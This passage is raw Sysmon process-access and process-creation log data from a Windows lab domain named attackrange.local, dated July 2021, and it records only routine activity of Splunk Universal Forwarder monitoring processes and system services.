Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3869E49FAEE5370C2CA63D6F87E03CD5,SHA256=EF55E064A968C5F3AE9F628F27A0DA05F5ACD60196B1CE9B1A4CC7E23D911D6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:25.118{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69275C7B523225BAC6FA16C718B7BBD0,SHA256=462BB130297765F04A9F896B3448ACDBCFCF6AC127295CAC1D8117AB33B78A7C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809380Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F711-60EB-BA79-00000000D001}3584C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809379Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809378Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809377Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809376Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809375Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809374Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809373Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809372Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809371Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809370Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:25.052{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F711-60EB-BA79-00000000D001}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809369Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.052{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F711-60EB-BA79-00000000D001}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809368Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.037{0C1E0330-F711-60EB-BA79-00000000D001}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809424Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.880{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F712-60EB-BD79-00000000D001}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809423Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.880{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000809422Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.880{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809421Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.880{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809420Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:26.880{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809419Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.880{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809418Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:26.880{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809417Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.880{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809416Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:26.864{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809415Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.864{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809414Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:26.864{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F712-60EB-BD79-00000000D001}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809413Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.864{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F712-60EB-BD79-00000000D001}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809412Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:26.865{0C1E0330-F712-60EB-BD79-00000000D001}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 
